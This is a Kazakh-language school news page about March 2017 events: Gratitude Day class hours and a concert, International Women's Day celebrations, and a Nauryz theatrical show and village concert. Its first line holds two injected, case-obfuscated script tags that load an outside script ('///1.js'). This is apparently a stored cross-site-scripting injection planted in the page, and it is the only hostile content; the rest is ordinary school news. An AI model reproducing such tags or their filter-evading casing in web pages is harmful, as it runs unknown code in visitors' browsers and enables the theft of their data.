<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.04.2017

2017 жылдың наурыз айының1 жұлдызында біздің елімізде жаңа болып кірген мереке Ризашылық күні тойланды. 1-11 сыныптарда сынып жетекшілері «Қазақстан – келісім мен ынтымақтастық елі» атты бірыңғай сынып сағаттарын өткізді.

5-11 сыныптар үшін концерт ұйымдастырылды, концертте оқушылар өздері дайындаған әр халықтың шығармашылық номерлерін көрсетті. Іс-шара өте қызықты және көңілді өтті. Мерекеде билер, әндер, театрлық көрсетілім болды. Қазақстан халықтар Ассамблеясының міндеттерін мен мақсаттарын көрсететін, қабырға газеттері мен плакаттар безендірілді.

  Сонымен қатар  біздің мектепте дәстүрлі түрде 8 наурыз Халықаралық әйелдер күніне арналған іс-шаралар өтті. 8 наурыз – бұл барлық аналардың, әжелердің сағына күтетін мейрамы. Осы күні біздің аналарымыз бен әжелерімізге  ерекше сыйлықтар мен құттықтаулар  дайындалады. Аналарды құттықтау  1-2 сыныптарда және дайындық тобында өтті. 3-4 сыныптарда  - «Көктемгі тамшы» іс-шарасы ұйымдастырылды. 5-6 сыныптарда «Ал, қане қыздар!» сайысы өтті, 8-11 сыныптарда «Көктемгі шабыт» атты іс-шара ұйымдастырылып, іс-шара барысында ұл балалар қыздарға дайындаған шығармашылық номерлерін көрсетті, соңында би кеші өткізілді.

15,16,17, 20 наурыз күндері біздің мектеп оқушылары үшін  «Мұрагер» БҰ-ның  белсенділері дайындаған «Қош келдің , Әз –Наурыз!» атты театрлық көрсетілім ұйымдастырылып, көрсетілді.Іс-шара барысында балалар Қыдыр атадан бата алды, «Тұсау кесу» салт-дәстүрін тамашалады, қазақ халқының ұлттық ойындары ойналды. Оқушылар ойындырға белсенді әрі қызығушылықпен ат салысты, сұрақтарға жауап берді.  Іс-шараның соңында балаларға  кейіпкерлерден бауырсақтар мен тәттілерберілді.

    18 наурыз күні  Заводской кентінің тұрғындары үшін «Наурыз мейрамы» өтті, біздің оқушылар концертті ұйымдастыруға белсенді қатысты.

Просмотров: 410


Пікір қосу



Деректерді қолтаңбаға қосу